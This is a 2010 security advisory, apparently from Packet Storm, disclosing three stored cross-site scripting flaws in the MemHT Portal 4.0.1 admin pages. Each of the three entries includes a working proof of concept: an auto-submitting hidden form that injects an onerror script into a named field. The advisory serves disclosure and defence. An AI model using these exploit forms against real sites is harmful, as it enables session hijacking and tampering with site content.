MemHT Portal 4.0.1 Cross Site Scripting

2010-11-03T00:00:00
ID PACKETSTORM:95423
Type packetstorm
Reporter High-Tech Bridge SA
Modified 2010-11-03T00:00:00

Description

                                        
                                            `=====================================  
Vulnerability ID: HTB22663  
Reference: http://www.htbridge.ch/advisory/stored_xss_cross_site_scripting_vulnerability_in_memht_portal.html  
Product: MemHT Portal  
Vendor: Miltenovik Manojlo ( http://www.memht.com/ )   
Vulnerable Version: 4.0.1 and probably prior versions  
Vendor Notification: 19 October 2010   
Vulnerability Type: Stored XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists due to failure in the "/admin/pages/articles/index.php" script to properly sanitize user-supplied input in "nome" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:  
  
<form action="http://host/admin.php?page=articles&op=editArticle&id=1&ok=true" method="post" name="main">  
<input type="hidden" name="nome" value="Example article<img src=x onerror=alert(123)>">  
<input type="hidden" name="argomento" value="1">  
<input type="hidden" name="descrizione" value="description">  
<input type="hidden" name="testo" value="text">  
<input type="hidden" name="autore" value="User">  
<input type="hidden" name="tags" value="article,example">  
<input type="hidden" name="language" value="0">  
<input type="hidden" name="usecomments" value="1">  
<input type="hidden" name="enabled" value="1">  
<input type="hidden" name="Submit" value="Modify">  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
=====================================  
Vulnerability ID: HTB22664  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_memht_portal_1.html  
Product: MemHT Portal  
Vendor: Miltenovik Manojlo ( http://www.memht.com/ )   
Vulnerable Version: 4.0.1 and probably prior versions  
Vendor Notification: 19 October 2010   
Vulnerability Type: Stored XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists due to failure in the "/admin/pages/users/index.php" script to properly sanitize user-supplied input in "adm_sito" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:  
  
<form action="http://host/admin.php?page=users&id=USER_ID&ok=true" method="post" enctype="multipart/form-data" name="main">  
<input type="hidden" name="adm_user" value="test">  
<input type="hidden" name="adm_enabled" value="1">  
<input type="hidden" name="adm_email" value="email@example.com">  
<input type="hidden" name="adm_sito" value="1<img src=x onerror=alert(123)>">  
<input type="hidden" name="adm_icq" value="">  
<input type="hidden" name="adm_msn" value="">  
<input type="hidden" name="adm_aol" value="">  
<input type="hidden" name="adm_yahoo" value="">  
<input type="hidden" name="adm_avatar" value="blank.png">  
<input type="hidden" name="avatar" value="">  
<input type="hidden" name="adm_gender" value="0">  
<input type="hidden" name="adm_title_enabled" value="0">  
<input type="hidden" name="adm_title_text" value="1">  
<input type="hidden" name="feedurl" value="http://www.memht.com/rss-news.xml">  
<input type="hidden" name="adm_signature" value="">  
<input type="hidden" name="adm_pass" value="">  
<input type="hidden" name="adm_pass2" value="">  
<input type="hidden" name="op" value="editUser">  
<input type="hidden" name="Submit" value="Modify">  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
=====================================  
Vulnerability ID: HTB22662  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_memht_portal.html  
Product: MemHT Portal  
Vendor: Miltenovik Manojlo ( http://www.memht.com/ )   
Vulnerable Version: 4.0.1 and probably prior versions  
Vendor Notification: 19 October 2010   
Vulnerability Type: Stored XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists due to failure in the "admin/pages/configuration/index.php" script to properly sanitize user-supplied input in "copyright" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:  
  
<form action="http://host/admin.php?page=configuration&op=siteConfig&ok=true" method="post" name="main">  
  
<input type="hidden" name="nome_sito" value="sitename">  
<input type="hidden" name="site_url" value="http://host">  
<input type="hidden" name="webmaster_mail" value="email@host.com">  
<input type="hidden" name="site_open" value="1">  
<input type="hidden" name="offlinemsg" value="">  
<input type="hidden" name="defpage" value="news">  
<input type="hidden" name="timestamp" value="%d/%m/%Y %H:%i">  
<input type="hidden" name="timezone" value="0">  
<input type="hidden" name="admin_ghosts" value="1">  
<input type="hidden" name="infobar" value="0">  
<input type="hidden" name="graphic_check" value="1">  
<input type="hidden" name="textarea_editor" value="1">  
<input type="hidden" name="modrewrite" value="0">  
<input type="hidden" name="footmsg" value="">  
<input type="hidden" name="copyright" value="copyright<img src=x onerror=alert(12345)>">  
<input type="hidden" name="descrizione" value="">  
<input type="hidden" name="metatags" value="">  
<input type="hidden" name="user_max_lunghezza" value="20">  
<input type="hidden" name="pass_max_lunghezza" value="20">  
<input type="hidden" name="user_confirm_email" value="1">  
<input type="hidden" name="approve_users" value="0">  
<input type="hidden" name="num_news_home" value="5">  
<input type="hidden" name="num_news_page" value="20">  
<input type="hidden" name="guest_msgbox" value="0">  
<input type="hidden" name="forumattachment" value="0">  
<input type="hidden" name="forumattachmentfolder" value="attachment">  
<input type="hidden" name="virtualpages" value="1">  
<input type="hidden" name="usecomments" value="1">  
<input type="hidden" name="guest_com" value="0">  
<input type="hidden" name="Submit" value="Save">  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
`